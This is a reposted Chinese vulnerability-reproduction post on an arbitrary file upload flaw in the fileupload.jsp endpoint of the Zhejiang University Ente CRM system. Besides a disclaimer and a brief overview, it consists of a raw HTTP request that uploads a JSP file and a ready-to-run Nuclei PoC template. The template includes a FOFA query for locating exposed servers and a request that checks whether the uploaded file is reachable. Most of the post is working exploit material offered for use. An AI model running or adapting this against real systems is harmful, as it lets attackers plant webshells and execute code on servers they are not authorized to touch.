「漏洞复现」浙大恩特客户资源管理系统 fileupload.jsp 任意文件上传

admin 2024年2月15日14:56:58评论19 views字数 1562阅读5分12秒阅读模式

免责声明

「漏洞复现」浙大恩特客户资源管理系统 fileupload.jsp 任意文件上传

此内容仅供技术交流与学习,请勿用于未经授权的场景。请遵循相关法律与道德规范。任何因使用本文所述技术而引发的法律责任,与本文作者及发布平台无关。如有内容争议或侵权,请及时联系我们。谢谢!

「漏洞复现」浙大恩特客户资源管理系统 fileupload.jsp 任意文件上传

「漏洞复现」浙大恩特客户资源管理系统 fileupload.jsp 任意文件上传

漏洞概述

「漏洞复现」浙大恩特客户资源管理系统 fileupload.jsp 任意文件上传

        浙大恩特客户资源管理系统中的fileupload.jsp接口存在安全漏洞,允许攻击者向系统上传任意恶意JSP文件,从而可能导致潜在的远程执行代码攻击。该漏洞可能会对系统的完整性和安全性产生严重影响。

「漏洞复现」浙大恩特客户资源管理系统 fileupload.jsp 任意文件上传

「漏洞复现」浙大恩特客户资源管理系统 fileupload.jsp 任意文件上传

漏洞复现

「漏洞复现」浙大恩特客户资源管理系统 fileupload.jsp 任意文件上传

POST /entsoft_en/entereditor/jsp/fileupload.jsp?filename=waodqqlo.jsp HTTP/1.1Host: User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15Content-Type: application/x-www-form-urlencodedConnection: closeAccept-Encoding: gzip, deflateContent-Length: 12folcamgi123

「漏洞复现」浙大恩特客户资源管理系统 fileupload.jsp 任意文件上传

「漏洞复现」浙大恩特客户资源管理系统 fileupload.jsp 任意文件上传

「漏洞复现」浙大恩特客户资源管理系统 fileupload.jsp 任意文件上传

NUCLEI POC

「漏洞复现」浙大恩特客户资源管理系统 fileupload.jsp 任意文件上传

id: zjuedu-webshell-uploadinfo:  name: 浙大恩特客户资源管理系统fileupload.jsp文件上传漏洞  author: rain  severity: high  description: 浙大恩特客户资源管理系统中的fileupload.jsp接口存在安全漏洞,允许攻击者向系统上传任意恶意JSP文件,从而可能导致潜在的远程执行代码攻击。该漏洞可能会对系统的完整性和安全性产生严重影响。  metadata:    fofa-query: title="欢迎使用浙大恩特客户资源管理系统"variables:  file_name: "{{to_lower(rand_text_alpha(8))}}"  file_content: "{{to_lower(rand_text_alpha(8))}}"requests:  - raw:      - |        POST /entsoft_en/entereditor/jsp/fileupload.jsp?filename={{file_name}}.jsp HTTP/1.1        Host: {{Hostname}}        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15        Content-Type: application/x-www-form-urlencoded        Connection: close        Accept-Encoding: gzip, deflate        Content-Length: 12        {{file_content}}      - |        GET /enterdoc/uploadfile/{{file_name}}.jsp HTTP/1.1        Host: {{Hostname}}        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15    matchers-condition: and    matchers:      - type: dsl        dsl:          - 'contains(body_2, "{{file_content}}")'

「漏洞复现」浙大恩特客户资源管理系统 fileupload.jsp 任意文件上传

「漏洞复现」浙大恩特客户资源管理系统 fileupload.jsp 任意文件上传

原文始发于微信公众号(知黑守白):「漏洞复现」浙大恩特客户资源管理系统 fileupload.jsp 任意文件上传

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年2月15日14:56:58
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   「漏洞复现」浙大恩特客户资源管理系统 fileupload.jsp 任意文件上传http://cn-sec.com/archives/2196260.html

发表评论

匿名网友 填写信息